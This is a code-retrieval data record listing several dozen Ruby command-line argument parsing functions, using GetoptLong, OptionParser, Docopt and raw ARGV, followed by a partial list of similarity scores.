"def parse_command_line()\n opts = GetoptLong.new(\n [ \"--input-file\" , \"-i\", GetoptLong::REQUIRED_ARGUMENT ],\n [ \"--verbose\" , \"-v\", GetoptLong::NO_ARGUMENT ]\n )\n #----------------------------- defaults\n\n opts.each do |opt, arg|\n if (opt == \"--input-file\" ) ; $input_file = arg\n elsif (opt == \"--verbose\" ) ; $verbose = 1\n end\n\n if ($verbose != 0) ; puts \"Option: #{opt}, arg #{arg.inspect}\" ; end\n end\nend",
"def run(argv = ARGV)\n parser.parse(argv)\n end",
"def process_arguments\n if arguments_valid? \n process_command\n else\n raise ArgumentError\n end\n end",
"def command_parse(argv)\n end",
"def parse_args()\n opts = GetoptLong.new(\n ['--host', GetoptLong::OPTIONAL_ARGUMENT],\n ['--port', GetoptLong::OPTIONAL_ARGUMENT],\n ['--columns', GetoptLong::OPTIONAL_ARGUMENT],\n ['--index', GetoptLong::REQUIRED_ARGUMENT],\n ['--type', GetoptLong::REQUIRED_ARGUMENT]\n )\n\n opts.each do |opt, arg|\n case opt\n when '--host'\n @host = arg\n when '--port'\n @port = arg\n when '--columnns'\n @cols = arg.split(\",\")\n when '--index'\n @index = arg\n when '--type'\n @type = arg\n end\n end\n\n if @index.nil?\n STDERR.puts 'missing argument: --index'\n exit 1\n end\n\n if @type.nil?\n STDERR.puts 'missing argument: --type'\n exit 1\n end\n\n if ARGV.length != 1\n STDERR.puts 'Missing argument: file'\n exit 1\n end\n\n @file = ARGV.shift\nend",
"def argv; end",
"def process_arguments(args)\n begin\n args.keys.sort.each do |k,v|\n case k\n when :quickpkg\n unless Boilermaker.gotroot? \n raise BoilerMakerErr.new(MSG_NO_ROOT)\n exit $!\n end\n unless Boilermaker.gotdevtools?\n raise BoilerMakerErr.new(MSG_NO_DEVTOOLS)\n exit $!\n end\n unless Boilermaker.gothdiutil? \n raise BoilerMakerErr.new(MSG_NO_HDIUTIL)\n exit $!\n end\n project = QuickPkg.new(args)\n # pp project.vars\n project.prep(args)\n project.build(args)\n when :createproj\n project = PkgProj.new(args)\n project.prep\n when :ktcheck\n unless Boilermaker.gotroot? \n raise BoilerMakerErr.new(MSG_NO_ROOT)\n exit $!\n end\n unless Boilermaker.gotradmind? \n raise BoilerMakerErr.new(MSG_NO_RADMIND)\n exit $!\n end\n Radmind.updateK(args)\n when :tconvert\n Radmind.convert(args)\n when :fetch\n unless Boilermaker.gotroot? \n raise BoilerMakerErr.new(MSG_NO_ROOT)\n exit $!\n end\n unless Boilermaker.gotradmind? \n raise BoilerMakerErr.new(MSG_NO_RADMIND)\n exit $!\n end \n Radmind.fetch(args)\n when :boil\n project = PkgProj.new(args)\n project.boil\n when :rollup\n unless Boilermaker.gotroot? \n raise BoilerMakerErr.new(MSG_NO_ROOT)\n exit $!\n end\n unless Boilermaker.gothdiutil? \n raise BoilerMakerErr.new(MSG_NO_HDIUTIL)\n exit $!\n end\n project = PkgProj.new(args)\n project.rollup\n when :package\n unless Boilermaker.gotroot? \n raise BoilerMakerErr.new(MSG_NO_ROOT)\n exit $!\n end\n unless Boilermaker.gotdevtools?\n raise BoilerMakerErr.new(MSG_NO_DEVTOOLS)\n exit $!\n end\n project = PkgProj.new(args)\n project.package(args)\n end\n end\n rescue => error\n puts error.message + \"\\n\"\n exit 1\n end\n \n end",
"def parse_args\n { :ip => ARGV[1] || '0.0.0.0', :port => (ARGV[0] || '9000').to_i,\n :logging => !(ENV['DEBUG'] &&\n ['0', 'no', 'false'].include?(ENV['DEBUG'].downcase)) }\nend",
"def parse_args\n doc = <<DOCOPT\nschwifty saves and downloads objects from ipfs, keeping track of their hashes in a garbage collection file in ~/.ipfs/ipfs_pinned_objects.yaml and an objects file in ./ipfs_objects.yaml\n\nUsage:\n schwifty add <files>...\n schwifty bootstrap (--clear | <nodes>... | --file=<bootstrap_list_yaml>)\n schwifty get <files_or_hashes>...\n schwifty gc\n schwifty -h | --help\n schwifty --version\n\nOptions:\n -h --help Show this screen.\n --version Show version.\nDOCOPT\n begin\n Docopt.docopt(doc)\n rescue Docopt::Exit => e\n puts e.message\n exit\n end\n end",
"def parse_args\n args_map = {:main => $0}\n ARGV.each { |arg|\n sep = arg.index('=')\n\n key = arg[0..sep-1].to_sym\n val = arg[sep+1..-1]\n\n if val == 'true'\n val = true\n end\n if val == 'false'\n val = false\n end\n args_map[key] = val\n }\n return args_map\n end",
"def parse_catchall\n bail_args(@argv.join(' ')) if(@argv.length != 0)\n end",
"def checkCommandLine\r\n if ARGV.length != 2\r\n puts \"\\nUsage: sum <fileName> <numThreads>\\n\\n\"\r\n exit(1)\r\n end\r\nend",
"def run\n\n if parsed_options? && arguments_valid? \n process_arguments \n process_command\n else\n output_usage\n end\n\n end",
"def parse!( args )\n @args = args\n @options.grep!(args)\n end",
"def extract_arguments!\n return ARGV[0], nil, nil if ARGV.length == 1\n\n raise(ArgumentError, \"Usage: mixtape-bu SOURCE [CHANGES] [DEST]\") unless ARGV.length == 3\n\n ARGV.take(3)\nend",
"def handle_arguments(arg_list)\n @args = []\n\n arg_list.each do |arg|\n case arg\n when /^--(backtrace|traceback)$/ then\n @backtrace = true\n when /^--bench(mark)?$/ then\n @benchmark = true\n when /^--debug$/ then\n $DEBUG = true\n else\n @args << arg\n end\n end\n end",
"def check_command_line\n if (!ARGV[0].nil? && ARGV[0].downcase == \"test\")\n @test = true\n elsif(ARGV.length < 2)\n puts \"USAGE: ruby main.rb <users_csv_file> <businesses_csv_file>\"\n puts \"OR\"\n puts \"USAGE: ruby main.rb test\"\n exit 1\n end\nend",
"def args\n options = {}\n options[:type] = ARGV[0]\n options[:url] = ARGV[1]\n\n if (ARGV[2].include? \"--custom-auth\") # [--custom-auth | --common-words | --vectors | --sensitive | --random | --slow]\n options[:auth] = 'dvwa'\n elsif (ARGV[2].include? \"--common-words\")\n @words = true\n arg = ARGV[2].split(\"=\")\n options[:words] = arg[1]\n end\n\n if (ARGV[3])\n arg = ARGV[3].split(\"=\")\n if (ARGV[3].include? \"--common-words\")\n @words = true\n options[:words] = arg[1]\n elsif (ARGV[3].include? \"--vectors\")\n @vectors = true\n options[:vectors] = arg[1]\n end\n end\n\n if (ARGV[4])\n arg = ARGV[4].split(\"=\")\n if (ARGV[4].include? \"--vectors\")\n @vectors = true\n options[:vectors] = arg[1]\n elsif (ARGV[4].include? \"--sensitive\")\n @sensitive = true\n options[:sensitive] = arg[1]\n end\n end\n\n if (ARGV[5])\n arg = ARGV[5].split(\"=\")\n if (ARGV[5].include? \"--sensitive\")\n @sensitive = true\n options[:sensitive] = arg[1]\n elsif (ARGV[5].include? \"--random\")\n if (arg[1] == \"true\")\n @random = true\n end\n options[:random] = arg[1]\n elsif (ARGV[5].include? \"--slow\")\n @slow = true\n options[:slow] = arg[1]\n end\n end\n\n if (ARGV[6])\n arg = ARGV[6].split(\"=\")\n if (ARGV[6].include? \"--random\")\n if (arg[1] == \"true\")\n @random = true\n end\n options[:random] = arg[1]\n elsif (ARGV[6].include? \"--slow\")\n @slow = true\n options[:slow] = arg[1]\n end\n end\n\n if (ARGV[7])\n arg = ARGV[7].split(\"=\")\n if (ARGV[7].include? \"--slow\")\n @slow = true\n options[:slow] = arg[1]\n end\n end\n\n options\nend",
"def parse(args)\n @args = args\n @instruction = args.join(' ')\n until @args.empty?\n arg = @args[0]\n if @instructions.key? arg\n @args.shift\n buff = args_extract(arg, @instructions[arg][0])\n @to_exec << [arg, buff]\n else\n bad_argument_exit(arg)\n end\n end\n run\n end",
"def parse_args\n require 'optimist'\n opts = Optimist.options do\n opt :source, \"Inventory Source UID\", :type => :string, :required => ENV[\"SOURCE_UID\"].nil?, :default => ENV[\"SOURCE_UID\"]\n opt :ingress_api, \"Hostname of the ingress-api route\", :type => :string, :default => ENV[\"INGRESS_API\"] || \"http://localhost:9292\"\n opt :config, \"Configuration file name\", :type => :string, :default => ENV[\"CONFIG\"] || \"default\"\n opt :data, \"Amount & custom values of generated items\", :type => :string, :default => ENV[\"DATA\"] || \"default\"\n end\n\n opts\nend",
"def initialize(given_args=ARGV)\n @options, @arguments, @extras = self.class.parse_options!(given_args)\n end",
"def parse!\n begin\n @opts = OptionParser.new(&method(:set_opts))\n @opts.parse!(@args)\n @options\n rescue Exception => e\n raise e if e.is_a?(SystemExit)\n\n $stderr.puts e.message\n exit 1\n end\n exit 0\n end",
"def run\n if parsed_options? && arguments_valid? \n process_arguments \n process_command\n else\n output_usage\n end\n end",
"def main\n arg_parser=GetoptLong.new\n arg_parser.set_options(\n [\"-e\", \"--exclude\", GetoptLong::REQUIRED_ARGUMENT],\n [\"-i\", \"--include\", GetoptLong::REQUIRED_ARGUMENT],\n [\"-h\", \"--headers\", GetoptLong::NO_ARGUMENT],\n [\"-u\", \"--usage\", GetoptLong::NO_ARGUMENT])\n\n arg_parser.each do |opt, arg|\n begin\n case opt\n when \"-u\"\n usage()\n exit(0);\n when \"-h\"\n printHeader\n when \"-i\"\n $includes.push(arg)\n when \"-e\"\n $excludes.push(arg)\n end\n rescue => err; puts err; break;\n end\n end\n\n # after all args if we still don't have a directory then show usage\n if (ARGV.length != 1)\n usage();\n end\n\n # convert strings to regexs once, rather than during filtering loop\n $excludes.collect! {|str| Regexp.new(str)}\n $includes.collect! {|str| Regexp.new(str)}\n\n processTags(getFiles(ARGV.shift))\n return\nend",
"def parse_args\n options = {}\n optparse = OptionParser.new do|opts|\n # Set a banner\n opts.banner = \"Usage: harness.rb [-c || --config ] FILE [-d || --testdir] DIR\"\n\n options[:testdir] = nil\n opts.on( '-d', '--testdir DIR', 'Execute tests in DIR' ) do|dir|\n options[:testdir] = dir\n end\n options[:config] = nil\n opts.on( '-c', '--config FILE', 'Use configuration FILE' ) do|file|\n options[:config] = file\n end\n\n opts.on( '-h', '--help', 'Display this screen' ) do\n puts opts\n exit\n end\n end\n optparse.parse!\n return options\nend",
"def initialize(args = {})\n parse_args(args)\n end",
"def process_commandline_args\n\n params = { :sidelength => 1, :mult => 10, :stroke_width => 0.7,\n :cols => 10, :rows => 10,\n :nested => 1, :nested_spacing => 0.2,\n :suppress_grid => true,\n :moveto_color => 'none', :lineto_color => '#ff0000', :background_color => '#fe8736',\n :xshift => 0, :yshift => 0,\n :shiftstep => nil, :shiftstepx => 0, :shiftstepy => 0, :shiftsteps => 15,\n :outputstepfile => 'output/img_%.04d.svg'\n }\n\n ARGV.each { |a|\n if v = a.match(/^--side-length=([0-9.]+)$/) then params[:sidelength] = v[1].to_f\n elsif v = a.match(/^--cols=([0-9]+)$/) then params[:cols] = v[1].to_i\n elsif v = a.match(/^--rows=([0-9]+)$/) then params[:rows] = v[1].to_i\n elsif v = a.match(/^--nested=([0-9]+)$/) then params[:nested] = v[1].to_i\n elsif v = a.match(/^--nested-spacing=(0?\\.[0-9]+)$/) then params[:nested_spacing] = v[1].to_f\n elsif v = a.match(/^--suppress-grid(=([01]))?$/) then params[:suppress_grid] = (v[1].nil? || v[2] == \"1\")\n elsif v = a.match(/^--mult=([.0-9e]+)$/) then params[:mult] = v[1].to_f\n elsif v = a.match(/^--stroke-width=([.0-9]+)$/) then params[:stroke_width] = v[1].to_f\n elsif v = a.match(/^--moveto-color=(none|#(\\h{3}|\\h{6}))$/)\n then params[:moveto_color] = v[1]\n elsif v = a.match(/^--lineto-color=(none|#(\\h{3}|\\h{6}))$/)\n then params[:lineto_color] = v[1]\n elsif v = a.match(/^--xshift=([-.0-9]+)$/) then params[:xshift] = v[1].to_f\n elsif v = a.match(/^--yshift=([-.0-9]+)$/) then params[:yshift] = v[1].to_f\n\n elsif v = a.match(/^--shiftstep=([-.0-9]+)$/) then params[:shiftstep] = v[1].to_f\n elsif v = a.match(/^--shiftstepx=([-.0-9]+)$/) then params[:shiftstepx] = v[1].to_f\n elsif v = a.match(/^--shiftstepy=([-.0-9]+)$/) then params[:shiftstepy] = v[1].to_f\n elsif v = a.match(/^--shiftsteps=([0-9]+)$/) then params[:shiftsteps] = v[1].to_i\n elsif v = a.match(/^--outputstepfile=['\"]*(.+\\.svg)['\"]*$/)\n then\n if v[1].match(/%[.0-9]*d/)\n params[:outputstepfile] = v[1]\n STDERR.puts \"got outputstepfile == #{params[:outputstepfile]}\"\n end\n else abort \"\\nArborting!!! -- Error: unknown argument #{a}\\n\\n\"\n end\n }\n\n unless params[:shiftstep].nil? \n params[:shiftstepx] = params[:shiftstep]\n params[:shiftstepy] = params[:shiftstep]\n end\n\n params\nend",
"def read_argv_flags argsIn\r\n skipVal = argsIn.length + 1\r\n argsIn.each_with_index do |argIn, ind|\r\n next if skipVal == ind\r\n arg = argIn.downcase()\r\n if arg[0].eql? '-'\r\n symAgr = strip_to_sym(arg)\r\n if @options[symAgr].is_a? String\r\n @options[symAgr] = argsIn[ind + 1]\r\n skipVal = ind + 1\r\n elsif @options[symAgr] == false\r\n @options[symAgr] = true\r\n elsif @options[symAgr].is_a? Array\r\n @options[symAgr] = argsIn[ind + 1]\r\n end\r\n elsif known_file_type arg\r\n @options[:f] << argIn.gsub(/(\\.\\/)|(\\.\\\\)/,'')\r\n end\r\n puts argIn\r\n end\r\n end",
"def read_from_cmdline\n require \"shellwords\"\n\n string = unless ARGV.empty?\n ARGV.join(' ')\n else\n if STDIN.tty?\n STDERR.print(\n %|(offline mode: enter name=value pairs on standard input)\\n|\n )\n end\n array = readlines rescue nil\n if not array.nil?\n array.join(' ').gsub(/\\n/n, '')\n else\n \"\"\n end\n end.gsub(/\\\\=/n, '%3D').gsub(/\\\\&/n, '%26')\n\n words = Shellwords.shellwords(string)\n\n if words.find{|x| /=/n.match(x) }\n words.join('&')\n else\n words.join('+')\n end\n end",
"def run\n if parsed_options? && arguments_valid? \n process_arguments \n process_command\n else\n output_options\n end\n end",
"def parse\n # parse flag arguments\n @oparse.parse!(@argv) rescue(bail_args($!))\n @parsed=true\n\n # the overriding class may implement additional arguments from here\n end",
"def process_command_line_options\r\n begin\r\n defer, found = \"\", false\r\n opts = GetoptLong.new(\r\n [ \"--help\", \"-h\", \"-?\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--load\", \"-l\", GetoptLong::REQUIRED_ARGUMENT ],\r\n [ \"--debug\", \"-d\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--quit\", \"-q\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--words\", \"-w\", GetoptLong::NO_ARGUMENT ])\r\n\r\n # Process the parsed options\r\n opts.each do |opt, arg|\r\n unless found\r\n puts; found = true\r\n end\r\n\r\n case opt\r\n when \"--debug\"\r\n @debug = true\r\n when \"--load\"\r\n defer << \"load\\\"#{arg}\\\" \"\r\n when \"--quit\"\r\n defer << \")quit \"\r\n when \"--words\"\r\n defer << \")words \"\r\n else\r\n fail SilentExit\r\n end\r\n end\r\n\r\n puts if found\r\n rescue Exception => e\r\n puts\r\n puts \"fOOrth available options:\"\r\n puts\r\n puts \"--help -h -? Display this message and exit.\"\r\n puts \"--load -l <filename> Load the specified fOOrth source file.\"\r\n puts \"--debug -d Default to debug ON.\"\r\n puts \"--quit -q Quit after processing the command line.\"\r\n puts \"--words -w List the current vocabulary.\"\r\n puts\r\n raise SilentExit\r\n end\r\n\r\n defer\r\n end",
"def run\n if options_valid? && option_combinations_valid? \n process_arguments \n process_command\n else\n output_usage\n end\n end",
"def parse_arguments\n options = {}\n parser = OptionParser.new do |opts|\n opts.on(\"-d\", \"--dir DIR\", \"absolute or relative path of the directory\") do |arg|\n options[:dir] = arg\n end\n\n opts.on(\"-p\", \"--pattern PATTERN\", \"search pattern - can contain asterisk(*) as wildcard\") do |arg|\n options[:pattern] = arg\n end\n end\n parser.parse!\n [options, parser]\nend",
"def parse_args\n options = {}\n optparse = OptionParser.new do|opts|\n # Set a banner\n opts.banner = \"Usage: harness.rb [options...]\"\n\n options[:tests] = []\n opts.on( '-t', '--tests DIR/FILE', 'Execute tests in DIR or FILE (defaults to \"./tests\")' ) do|dir|\n options[:tests] << dir\n end\n\n options[:type] = 'skip'\n opts.on('--type TYPE', 'Select puppet install type (pe, git, skip) - default \"skip\"') do\n |type|\n unless File.directory?(\"setup/#{type}\") then\n puts \"Sorry, #{type} is not a known setup type!\"\n exit 1\n end\n options[:type] = type\n end\n\n options[:puppet] = 'git://github.com/puppetlabs/puppet.git#HEAD'\n opts.on('-p', '--puppet URI', 'Select puppet git install URI',\n \" #{options[:puppet]}\",\n \" - URI and revision, default HEAD\",\n \" just giving the revision is also supported\"\n ) do |value|\n options[:type] = 'git'\n options[:puppet] = value\n end\n\n options[:facter] = 'git://github.com/puppetlabs/facter.git#HEAD'\n opts.on('-f', '--facter URI', 'Select facter git install URI',\n \" #{options[:facter]}\",\n \" - otherwise, as per the puppet argument\"\n ) do |value|\n options[:type] = 'git'\n options[:facter] = value\n end\n\n options[:config] = nil\n opts.on( '-c', '--config FILE', 'Use configuration FILE' ) do|file|\n options[:config] = file\n end\n\n opts.on( '-d', '--dry-run', \"Just report what would be done on the targets\" ) do |file|\n $dry_run = true\n end\n\n options[:mrpropper] = FALSE\n opts.on( '--mrpropper', 'Clean hosts' ) do\n puts \"Cleaning Hosts of old install\"\n options[:mrpropper] = TRUE\n end\n\n options[:stdout_only] = FALSE\n opts.on('-s', '--stdout-only', 'log output to STDOUT but no files') do\n puts \"Will log to STDOUT, not files...\"\n options[:stdout_only] = TRUE\n end\n\n options[:quiet] = false\n opts.on('-q', '--quiet', 'don\\'t log output to STDOUT') do\n options[:quiet] = true\n end\n\n opts.on( '-h', '--help', 'Display this screen' ) do\n puts opts\n exit\n end\n end\n optparse.parse!\n return options\nend",
"def run \n if parsed_options? && arguments_valid? \n puts \"Start at #{DateTime.now}\"\n process_arguments(@validoptions.args)\n puts \"Finished at #{DateTime.now}\"\n else\n raise BoilerMakerErr.new(\"Could not parse options. An unknown error has ocurred.\")\n exit $!\n end\n end",
"def parse!(argv)\n options = {}\n parser = configure_base!(OptionParser.new)\n parser.parse!(argv, into: options)\n unless options.key?(:input)\n puts 'Missing --input argument, which is required.'\n Advent2019.show_help(parser)\n end\n options\n end",
"def parse_command_line(args)\n all_opts = OptionParser.new do |opts|\n opts.banner = \"Usage: #{PROGRAM_NAME} [OPTIONS] PASSWORD\"\n opts.separator ''\n\n opts.on(\n '-t',\n '--load-timeout [TIMEOUT_SECONDS]',\n Integer,\n 'Timeout in seconds to wait for',\n 'gitlab-rails console to load',\n 'and process the change.',\n \"Defaults to #{DEFAULT_LOAD_TIMEOUT} seconds.\"\n ) do |timeout|\n @options.load_timeout = timeout\n end\n\n opts.on(\n '-v',\n '--verbose',\n 'Print out debug info when processing.'\n ) do\n @options.debug = true\n end\n\n opts.on(\n '-h',\n '--help',\n 'Help Message'\n ) do\n puts opts\n @options.help_requested = true\n end\n end\n\n all_opts.parse!(args)\n\n unless @options.help_requested\n fail('ERROR: You must specify the password to set') if (ARGV.length < 1)\n\n @options.password = ARGV[0]\n fail('ERROR: Password cannot be empty') if @options.password.strip.empty?\n end\n end",
"def args\n Mysh.parse_args(cooked_body)\n end",
"def parse!(argv)\n\t\t$log.debug(\"#{self.class}.#{__method__}('#{argv.join(\" \")}'#{block_given? ? ',&block' : ''})\")\n\t\tif (argv.size == 0)\n\t\t\traise OptionParser::InvalidArgument, \"No arguments specified.\"\n\t\tend\n\n\t\t# @options is used to store recognized command-line args\n\t\t@options = Hash.new\n\t\twhile arg = argv.shift\n\t\t\tcase arg\n\t\t\twhen \"-cmd\"\n\t\t\t\t@command = argv.shift\n\t\t\twhen \"-debug\"\n\t\t\t\t$log.level = Logger::DEBUG\n\t\t\t\t$logerr.level = Logger::DEBUG\n\t\t\twhen \"-opt\"\n\t\t\t\t@options[:dataset] = argv.shift\n\t\t\twhen \"-path\"\n\t\t\t\t@options[:path] = argv.shift\n\t\t\twhen \"-target\"\n\t\t\t\t@options[:target] = argv.shift\n\t\t\twhen \"-log\"\n\t\t\t\tlevel = $log.level\n\t\t\t\tlog_path = argv.shift\n\t\t\t\t$log = Logger.new(log_path)\n\t\t\t\t$log.level = level\n\t\t\t\t$logerr = Logger.new(log_path)\n\t\t\t\t$logerr.level = level\n\t\t\telse\n\t\t\t\targv.unshift(arg)\n\t\t\t\tif block_given?\n\t\t\t\t\tunless (argv = yield(argv))\n\t\t\t\t\t\traise OptionParser::InvalidArgument, \"Unknown argument.\"\n\t\t\t\t\tend\n\t\t\t\telse break\n\t\t\t\tend\n\t\t\tend\t\t\n\t\tend\n\t\traise OptionParser::InvalidArgument, \"No command specified.\" unless @command\n\t\tunless (self.class::COMMANDS.include?(@command) && self.respond_to?(@command))\n\t\t\traise OptionParser::InvalidArgument, \"Unknown command '#{@command}' specified.\"\n\t\tend\n\t\treturn argv\n\tend",
"def run(arguments)\n parse(arguments)\n configure\n execute\n end",
"def consume(*args)\n #puts \"Consuming #{args.inspect} from #{ARGV.inspect}\"\n args.each {|arg| ARGV.delete(arg) }\n# ARGV.options do |opts|\n# opts.on(*args) {}\n# opts.parse!\n# end\n #puts \"ARGV: #{ARGV.inspect}\"\n #@args_backup = @args.clone\nend",
"def parse(argv)\n options = parser.process!(argv)\n validate_options(options)\n Revamp.logger.level = Logger::INFO unless options[:verbose]\n options\n end",
"def getArguments\n\n\t# Parse the arguments\n\ttheArgs = { :clang => false,\n\t\t\t\t:rewrite => false,\n\t\t\t\t:help => false,\n\t\t\t\t:paths => [],\n\t\t\t\t:exclude => [] }\n\n\ttheParser = OptionParser.new do |opts|\n\t\topts.banner = \"Usage:\\n rn-format [--help] [--clang] [--rewrite] [--exclude=PATH] PATH [PATH...]\";\n\t\topts.separator \"\";\n\t\topts.separator \"Reformat any source files within the supplied paths,\";\n\t\topts.separator \"displaying the results to standard output.\";\n\t\topts.separator \"\";\n\t\topts.separator \"Options:\";\n\n\t\topts.on('--clang',\t\t\t\t\t\t'Show raw clang-format output') do\n\t\t\ttheArgs[:clang] = true;\n\t\tend\n\n\t\topts.on('--rewrite',\t\t\t\t\t'Rewrite files in-place') do\n\t\t\ttheArgs[:rewrite] = true;\n\t\tend\n\n\t\topts.on('--exclude=PATH',\t\t\t\t'Exclude a path') do |thePath|\n\t\t\ttheArgs[:exclude] << File.expand_path(thePath);\n\t\tend\n\n\t\topts.on('--help',\t\t\t\t\t\t'Show the help') do\n\t\t\ttheArgs[:help] = true;\n\t\tend\n\tend\n\n\ttheParser.parse!;\n\ttheArgs[:paths] = ARGV;\n\n\n\n\t# Show the help\n\tif (theArgs[:help] || theArgs[:paths].empty?)\n\t\tputs theParser.help();\n\t\texit(false);\n\tend\n\t\n\treturn theArgs;\n\nend",
"def parse_args(args)\n options = OpenStruct.new\n\n options[:html] = false\n options[:directory] = './'\n options[:ext] = '.jpg'\n\n opt_parser = OptionParser.new do |opts|\n opts.banner = 'Usage: main.rb [options]'\n opts.separator ''\n opts.separator 'Options:'\n\n opts.on('-f', '--filename FILE', 'Filename to write') do |f|\n options[:filename] = f\n end\n\n opts.on('-d', '--directory DIRECTORY', 'Image directory to process') do |d|\n options[:directory] = d\n end\n\n opts.on('--html', 'Output HTML instead of CSV') do\n options[:html] = true\n end\n\n opts.on('-h', '--help', 'Help') do\n puts opts\n exit\n end\n end\n\n begin\n opt_parser.parse(args)\n rescue OptionParser::ParseError\n $stderr.print(\"Argument Error: #{$ERROR_INFO}\\n\")\n exit\n end\n\n # set default filename if not supplied\n unless options[:filename]\n ext = options[:html] ? 'html' : 'csv'\n options[:filename] = \"exif_data_#{Time.now.strftime('%s')}.#{ext}\"\n end\n\n options\n end",
"def parse_command_line &block\n data = {}\n\n OptionParser.new do |opts|\n opts.banner = \"Usage: #{File.basename($0)} [options]\"\n\n opts.on(\"-c CONFIG\", \"--conf CONFIG\", \"YAML config file\") do |config|\n data[\"config\"] = config\n end\n\n opts.on(\"-p PARAMS\", \"--params PARAMS\", \"Additional default options - key: value as JSON string, override values from config file\") do |params|\n data[\"params\"] = JSON.parse(params)\n end\n\n # process custom args, if given\n block.call(opts) if block_given?\n\n opts.on_tail('-h', '--help', 'display this help and exit') do\n puts opts\n exit\n# return nil\n end\n\n# begin\n opts.parse(ARGV)\n# rescue OptionParser::InvalidOption\n# # do nothing\n# end\n\n end\n\n @args = data\n end",
"def parse_args(args)\n options = {\n :console => false,\n :tag => nil\n }\n\n opt_parser = OptionParser.new do |opts|\n opts.banner = \"Usage: #{$0} <input filepath> [options]\"\n\n opts.separator \"\"\n opts.separator \"Data options:\"\n\n opts.on(\"-t T\", String, \"Tag\") do |t|\n options[:tag] = t\n end\n opts.separator \"\"\n opts.on_tail(\"-h\", \"--help\", \"Show this message\") do\n puts opts\n exit\n end\n end\n\n opt_parser.parse!(args)\n options\nend",
"def parse(args)\n @options = {}\n @options[:command] = :scan # Default command is to scan for lints\n\n OptionParser.new do |parser|\n parser.banner = \"Usage: #{@application.executable_name} [options] [file1, file2, ...]\"\n\n add_linter_options parser\n add_file_options parser\n add_misc_options parser\n add_info_options parser\n end.parse!(args)\n\n # Any remaining arguments are assumed to be files that should be linted\n @options[:included_paths] = args\n\n @options\n rescue OptionParser::InvalidOption => ex\n raise InvalidCliOptionError,\n \"#{ex.message}\\nRun `#{@application.executable_name} --help` to \" \\\n 'see a list of available options.'\n end",
"def parse_command_line\n prepend_environment_options\n options = options_with_defaults\n\n OptionParser.new do |parser|\n\n parser.on(\"-h\", \"--help\", \"Show help\") do |_help_requested|\n ARGV << 'h' # pass on the request to the command processor\n options.suppress_command_line_validation = true\n end\n\n parser.on('-i', '--input_dir DIR',\n \"Input directory containing source data files, default: '#{DEFAULT_INPUT_DIR}'\") do |v|\n options.input_dir = File.expand_path(v)\n end\n\n parser.on('-o', '--output_dir DIR',\n \"Output directory to which report files will be written, default: '#{DEFAULT_OUTPUT_DIR}'\") do |v|\n options.output_dir = File.expand_path(v)\n end\n\n parser.on('-r', '--receipt_dir DIR',\n \"Directory root from which to find receipt filespecs, default: '#{DEFAULT_RECEIPT_DIR}'\") do |v|\n options.receipt_dir = File.expand_path(v)\n end\n\n parser.on('-s', '--shell', 'Start interactive shell') do |v|\n options.interactive_mode = true\n end\n\n parser.on('-v', '--[no-]verbose', 'Verbose mode') do |v|\n options.verbose_mode = v\n end\n\n parser.on('-y', '--[no-]say', 'Say error messages.') do |v|\n options.say = v\n end\n\n parser.on('', '--[no-]receipts', 'Include report on existing and missing receipts.') do |v|\n options.do_receipts = v\n end\n end.parse!\n\n if options.verbose_mode\n puts \"Run Options:\"\n ap options.to_h\n end\n\n options\n end",
"def run\n if arguments = parse_arguments\n begin\n process(arguments)\n rescue RuntimeError => ex\n Console.puts ex.message, :red\n exit 1\n end\n else\n if show_help?\n show_help(nil, Console.width).each do |line|\n Console.puts line, :cyan\n end\n else\n show_usage(nil, Console.width).each do |line|\n Console.puts line, :yellow\n end\n end\n exit 2\n end\n end",
"def process_arguments\n if @options.config != nil\n if File.exist?(@options.config)\n load_config_file \n @config.each do |k, v|\n @project = v\n\n#need to do \n\n end\n else\n error(\"Config file does not exist\")\n end\n else\n @project = @options.project || \"NA\"\n @sub_dir = @options.sub_dir || \"NA\"\n @outname = @options.outname || @options.sub_dir\n @outdir = @options.outdir || $config[\"outdir\"]\n @bams = @options.bams\n @c_design = @options.c_design || nil\n @queue = @options.queue || $config[\"queue\"]\n @ref = @options.ref || \"hg19\"\n @rg_id = @options.rg_id || $config[\"rg\"][\"rg_id\"]\n @sample = @options.sample || \"NA\"\n\n end\n end",
"def process_argv!\n super\n if raw_script_name =~ /(\\w+)-([\\w\\-]+)/\n self.command = $2\n else\n self.command = rest.shift\n end\n end",
"def validate_arguments()\n usage unless ARGV.count > 0\nend",
"def parse arguments\n begin\n @option_parser.parse! arguments\n rescue StandardError => e\n puts @option_parser\n puts\n puts e.message\n exit(-1)\n end\n\n @options\n end",
"def handle(args, stdin, stdout)\n end",
"def run\n if parsed_options? && arguments_valid? \n puts \"Start at #{DateTime.now}\\n\\n\" if @options.verbose\n output_options if @options.verbose\n process_arguments \n start\n puts \"\\nFinished at #{DateTime.now}\" if @options.verbose\n else\n output_usage\n end \n end",
"def parse_argv(argv)\n # command line\n options = {}\n OptionParser.new do |opts|\n options[:queue_name] = nil\n opts.banner = \"Usage: #{__FILE__} [options]\"\n\n opts.on('-c', '--config CONFIG_FILE', 'config file') do |c|\n options[:file_name] = c\n end\n opts.on('-q', '--queue QUEUE', 'queue to be consumed') do |q|\n options[:queue_name] = q\n end\n end.parse!\n @options = options\n end",
"def go(argv)\n logger.debug(\"Using args passed in: #{argv.inspect}\")\n\n cmd = nil\n\n @optparse = OptionParser.new do |opts|\n cmd = super(argv, opts, @config)\n\n opts.on('-v', '--version', 'Print the version') do\n puts \"#{name} #{version}\"\n abort\n end\n end\n\n @optparse.parse!(argv)\n\n logger.debug(\"Parsed config: #{@config.inspect}\")\n\n cmd.execute(argv, @config)\n end",
"def run(*args); end",
"def run(*args); end",
"def run(*args); end",
"def run(*args); end",
"def run(*args); end"
] |
[
"0.74129695",
"0.70760596",
"0.7033612",
"0.70210594",
"0.69626695",
"0.69026005",
"0.68571657",
"0.68488073",
"0.68344635",
"0.6767632",
"0.6656666",
"0.66463333",
"0.66262084",
"0.6620613",
"0.6619896",
"0.66112757",
"0.6601038",
"0.65809566",
"0.6579702",
"0.6564423",
"0.65319717",
"0.65173054",
"0.64691824",
"0.6468377",
"0.64557487",
"0.64531684",
"0.6445904",
"0.6427716",
"0.64206636",
"0.64202595",
"0.63958865",
"0.6395636",
"0.6395636",
"0.6395636",
"0.6387318",
"0.63869804",
"0.6370895",
"0.6358798",
"0.6345734",
"0.6338437",
"0.6336385",
"0.6305482",
"0.629856",
"0.6296537",
"0.6293318",
"0.62837845",
"0.6282528",
"0.6265478",
"0.625408",
"0.62506664",
"0.62411445",
"0.62408555",
"0.6216619",
